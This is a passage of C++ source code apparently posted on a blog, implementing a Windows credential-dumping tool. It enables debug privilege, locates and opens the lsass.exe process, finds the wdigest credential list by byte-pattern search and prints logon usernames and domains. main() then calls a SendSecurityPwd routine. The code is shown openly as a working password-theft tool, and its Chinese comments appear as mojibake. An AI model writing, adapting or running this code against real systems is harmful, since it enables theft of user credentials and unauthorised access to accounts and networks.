    ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 8)), SecBuf, 0x200, &dwBytesRead);
    pdataAddr = (LPVOID)((DWORD)MemBuf + 8);
    *(DWORD *)pdataAddr = (DWORD)SecBuf;

    ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 0xC)), ThirdBuf, 0x200, &dwBytesRead);
    pdataAddr = (LPVOID)((DWORD)MemBuf + 0xC);
    *(DWORD *)pdataAddr = (DWORD)ThirdBuf;

    break;
  }
  }
  return;
}

CString CReadPsw::CharToCString(IN char* result)
{
  //½«char ת»»Îª CString×Ö·û
  DWORD dwNum = MultiByteToWideChar(CP_ACP, 0, result, -1, NULL, 0);
  wchar_t *pwText;
  pwText = new wchar_t[dwNum];
  if (!pwText)
  {
    delete[]pwText;
    return NULL;
  }
  MultiByteToWideChar(CP_ACP, 0, result, -1, pwText, dwNum);// ¿ªÊ¼×ª»»
  CString cstr = pwText;
  delete pwText;
  return cstr;
}

struct RTL_USER_PROCESS_PARAMETERS_I
{
  BYTE Reserved1[16];
  PVOID Reserved2[10];
  UNICODE_STRING ImagePathName;
  UNICODE_STRING CommandLine;
};

struct PEB_INTERNAL
{
  BYTE Reserved1[2];
  BYTE BeingDebugged;
  BYTE Reserved2[1];
  PVOID Reserved3[2];
  struct PEB_LDR_DATA* Ldr;
  RTL_USER_PROCESS_PARAMETERS_I* ProcessParameters;
  BYTE Reserved4[104];
  PVOID Reserved5[52];
  struct PS_POST_PROCESS_INIT_ROUTINE* PostProcessInitRoutine;
  BYTE Reserved6[128];
  PVOID Reserved7[1];
  ULONG SessionId;
};

HANDLE CReadPsw::GetProcessHandleByName(const TCHAR *szName)
{
  //
  // GetProcessHandle»ñµÃlsass.exe½ø³Ì¾ä±ú
  //
  DWORD dwProcessId, ReturnLength, nBytes;
  PROCESS_BASIC_INFORMATION pbi;
  //smPPROCESS_BASIC_INFORMATION pbi = (smPPROCESS_BASIC_INFORMATION)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY, sizeof(smPROCESS_BASIC_INFORMATION));
  WCHAR Buffer[MAX_PATH + 0x20];
  HANDLE hProcess;
  PWCHAR pRetStr;
  pNTQUERYPROCESSINFORMATION NtQueryInformationProcess;
  CHAR  szCurrentPath[MAX_PATH];

  NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle(_T("ntdll.dll")), "NtQueryInformationProcess");

  // Process ID Ò»¶¨ÊÇ 4 µÄ±¶Êý
  for (dwProcessId = 4; dwProcessId < 10 * 1000; dwProcessId += 4)
  {
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
    if (hProcess != NULL)
    {
      if (!NtQueryInformationProcess(hProcess, 27, &Buffer, sizeof(Buffer), &ReturnLength)) //if (!NtQueryInformationProcess(hProcess, 27, Buffer, sizeof(Buffer), &ReturnLength))
      {
        //pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + 4)); //32bit
        pRetStr = (PWCHAR)Buffer + 8; //64bit

        wprintf(pRetStr);
        printf("\r\n");

        nBytes = WideCharToMultiByte(CP_ACP, 0, pRetStr, -1, szCurrentPath, MAX_PATH, NULL, NULL);
        if (nBytes)
        {
          PCHAR pCurName = &szCurrentPath[nBytes - 1];
          while (pCurName >= szCurrentPath)
          {
            if (*pCurName == '\\') break;
            pCurName--;
          }
          pCurName++;
          CString str = CharToCString(pCurName);
          if (lstrcmpi(szName, str) == 0)
          {
            printf("Found Lsass, Returning\r\n");
            return hProcess;
          }
        }
      }
      // ¹Ø±Õ´ò¿ªµÄ¾ä±ú
      CloseHandle(hProcess);
    }
  }
  return NULL;
}

LPVOID CReadPsw::GetEncryptListHead()
{
  //
  // ¸ù¾ÝKeyPointerSign[]»ñµÃÃÜÎÄ´æ´¢µÄ¹Ø¼üÏà¹ØµØÖ·
  //
  HINSTANCE hMod;
  LPVOID  pEndAddr, KeyPointer, pTemp;

  hMod = LoadLibrary(_T("wdigest.dll"));
  pEndAddr = GetProcAddress(hMod, "SpInstanceInit");
  pTemp = hMod;
  KeyPointer = NULL;
  while (pTemp < pEndAddr && pTemp != NULL)
  {
    KeyPointer = pTemp;
    pTemp = (LPVOID)search_bytes((PBYTE)pTemp + sizeof(KeyPointerSign), (PBYTE)pEndAddr, \
      KeyPointerSign, sizeof(KeyPointerSign));
  }
  //KeyPointer = (LPVOID)(*(DWORD *)((DWORD)KeyPointer - 4)); //32BIT
  KeyPointer = (LPVOID)((DWORD)KeyPointer - 4);
  FreeLibrary(hMod);
  return KeyPointer;
}

void CReadPsw::printSessionInfo(pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData,
  pLSAFREERETURNBUFFER LsaFreeReturnBuffer,
  PLUID pCurLUID,
  OUT READPSWDATA_S* tagRPWDATA)
{
  PSECURITY_LOGON_SESSION_DATA pLogonSessionData;

  LsaGetLogonSessionData(pCurLUID, &pLogonSessionData);
  printf("UserName: %S\n", pLogonSessionData->UserName.Buffer);  //̞
  printf("LogonDomain: %S\n", pLogonSessionData->LogonDomain.Buffer); //µÇ½Óò

  wsprintfW(tagRPWDATA->szUserName, _T("%s"), pLogonSessionData->UserName.Buffer);
  wsprintfW(tagRPWDATA->szDomain, _T("%s"), pLogonSessionData->LogonDomain.Buffer);

  LsaFreeReturnBuffer(pLogonSessionData);
}

int CReadPsw::EnableDebugPrivilege()
{
  HANDLE hToken;
  LUID  sedebugnameValue;
  TOKEN_PRIVILEGES tkp;

  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
  {
    puts("OpenProcessToken fail");
    return 0;
  }
  if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
  {
    puts("LookupPrivilegeValue fail");
    return 0;
  }

  tkp.PrivilegeCount = 1;
  tkp.Privileges[0].Luid = sedebugnameValue;
  tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
  {
    puts("AdjustTokenPrivileges fail");
    return 0;
  }
  return 1;
}

PBYTE CReadPsw::search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
{
  //
  // ÔÚpBeginÓëpEndÖ®¼äËÑË÷pBytesµØÖ·´¦µÄÖ¸¶¨×Ö½ÚÐòÁУ¬×Ö½Ú¸öÊýΪnsize
  //
  DWORD count;
  PBYTE pDst;

  while ((DWORD)pBegin + (DWORD)nsize <= (DWORD)pEnd)
  {
    pDst = pBytes;
    count = 0;
    while (count < nsize && *pBegin == *pDst)
    {
      pBegin++;
      pDst++;
      count++;
    }
    if (count == nsize) break;
    pBegin = pBegin - count + 1;
  }
  if (count == nsize)
  {
    return (PBYTE)((DWORD)pBegin - (DWORD)count);
  }
  else
  {
    return NULL;
  }
}

// The one and only application object

CWinApp theApp;

using namespace std;

int main()
{
  int nRetCode = 0;

  HMODULE hModule = ::GetModuleHandle(nullptr);

  if (hModule != nullptr)
  {
    // initialize MFC and print and error on failure
    if (!AfxWinInit(hModule, nullptr, ::GetCommandLine(), 0))
    {
      // TODO: change error code to suit your needs
      wprintf(L"Fatal Error: MFC initialization failed\n");
      nRetCode = 1;
    }
    else
    {
      // TODO: code your application's behavior here.
    }
  }
  else
  {
    // TODO: change error code to suit your needs
    wprintf(L"Fatal Error: GetModuleHandle failed\n");
    nRetCode = 1;
  }

  wprintf(L"Press enter to continue\n");
  CReadPsw  m_readPsw;
  m_readPsw.SendSecurityPwd(NULL);

  std::cin.get();

  return nRetCode;
}

Leave a Reply

Your email address will not be published. Required fields are marked *